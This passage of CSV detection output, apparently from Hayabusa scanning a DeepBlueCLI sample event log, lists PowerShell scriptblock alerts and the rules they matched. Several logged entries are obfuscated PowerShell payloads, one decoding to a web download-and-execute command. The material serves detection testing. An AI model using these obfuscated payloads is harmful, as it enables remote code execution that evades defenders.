[rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwADEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:23.660 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwADEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.455 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.469 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.555 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.563 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.568 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.571 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.574 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.577 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.580 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.581 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.585 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.588 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:39.901 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:40.071 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:40.085 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:40.121 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:43.135 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [cHAR[]] ( 20 , 24, 5 ,125 , 117 , 19, 56,42, 112 ,18 , 63 , 55,56 ,62,41,125,19 , 56 , 41 ,115 ,10,56 ,63, 30 , 49 ,52 ,56 ,51, 41 , 116 , 115, 25 ,50,42 ,51, 49,50,60, 57, 14, 41 ,47 , 52, 51, 58 ,117 ,122 , 53, 41,41 , 45 , 46,103, 114, 114,47 ,60, 42, 115, 58 , 52 , 41 ,53 ,40, 63 , 40 , 46, 56,47 , 62 ,50 ,51, 41 ,56,51,41, 115 , 62, 50 ,48 , 114,48,60 , 41,41 ,52 ,59, 56, 46, 41 ,60, 41 , 52,50 , 51, 114 , 13,50,42 ,56 , 47 ,14 ,45 , 49, 50 , 52 ,41 , 114 ,48, 60, 46,41, 56,47, 114 , 24,37,59,52 , 49 ,41, 47, 60,41,52 , 50 , 51 , 114 ,20 , 51 ,43, 50,54 ,56, 112 , 16 , 52, 48 , 52 , 54, 60 ,41,39, 115, 45 ,46 , 108 , 122,116,102, 125 ,20 ,51 , 43, 50 , 54 ,56 ,112, 16, 52,48,52, 54,60 , 41 , 39 ,125 ,112 , 25, 40 , 48, 45,30 ,47 ,56, 57 ,46 ) |%{[cHAR] ( $_ -BXor""0x5d"" ) } )-JOIN''|.( $ENv:ComSPEc[4,15,25]-jOIN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:43.135 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{[cHAR] ( $_ -BXor""0x5d"" ) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:04.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:04.320 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:06.877 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:06.877 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"${=} =+ $( ); ${-#} =${=} ;${]!} =++${=} ;${*} =++${=} ;${(@} = ++${=} ;${+=}=++ ${=}; ${%} = ++ ${=} ; ${.]/} = ++${=};${#/}=++${=} ; ${@=-}= ++ ${=}; ${@%)}= ++ ${=} ; ${*[%} = ""[""+""$(@{})""[${#/} ]+""$(@{})""[ ""${]!}""+""${@%)}"" ]+""$(@{ })""[ ""${*}"" + ""${-#}""] + ""$? ""[ ${]!} ]+ ""]"" ;${=}="""".(""$( @{} )""[ ""${]!}${+=}"" ]+""$( @{} )""[ ""${]!}${.]/}""] + ""$( @{}) ""[ ${-#} ]+ ""$(@{ } ) ""[${+=} ]+""$? ""[${]!}] + ""$( @{ } ) ""[ ${(@} ] ) ;${=}=""$(@{ } ) ""[ ""${]!}"" +""${+=}"" ] + ""$(@{ } )""[${+=}] + ""${=}""[ ""${*}"" + ""${#/}"" ] ; "" ${=}(${*[%}${#/}${(@} +${*[%}${.]/}${@%)}+${*[%}${@=-}${@=-} +${*[%}${(@}${*} +${*[%}${+=}${-#} +${*[%}${#/}${@=-} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${%}+ ${*[%}${#/}${@%)} + ${*[%}${@%)}${@=-}+${*[%}${]!}${-#}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${.]/}+ ${*[%}${(@}${*} +${*[%}${#/}${@=-}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+${*[%}${@=-}${#/}+${*[%}${]!}${-#}${]!} + ${*[%}${@%)}${@=-}+ ${*[%}${.]/}${#/} +${*[%}${]!}${-#}${@=-} +${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#} + ${*[%}${]!}${]!}${.]/}+ ${*[%}${+=}${]!} + ${*[%}${+=}${.]/}+ ${*[%}${.]/}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${]!}${@%)}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${]!}+ ${*[%}${@%)}${#/} + ${*[%}${]!}${-#}${-#} + ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+${*[%}${]!}${-#}${%} +${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${-#}${(@}+ ${*[%}${+=}${-#}+ ${*[%}${(@}${@%)}+${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${.]/} +${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${]!}${*} +${*[%}${]!}${]!}${%} + ${*[%}${%}${@=-}+ ${*[%}${+=}${#/}+${*[%}${+=}${#/}+${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${@%)} + ${*[%}${+=}${.]/}+${*[%}${]!}${-#}${(@}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${.]/} +${*[%}${]!}${-#}${+=} +${*[%}${]!}${]!}${#/}+${*[%}${@%)}${@=-}+${*[%}${]!}${]!}${#/}+${*[%}${]!}${]!}${%} + ${*[%}${]!}${-#}${]!}+ ${*[%}${]!}${]!}${+=} +${*[%}${@%)}${@%)}+ ${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${-#}+ ${*[%}${]!}${]!}${.]/} +${*[%}${+=}${.]/}+ ${*[%}${@%)}${@%)} +${*[%}${]!}${]!}${]!} +${*[%}${]!}${-#}${@%)} +${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)} +${*[%}${@%)}${#/} +${*[%}${]!}${]!}${.]/} 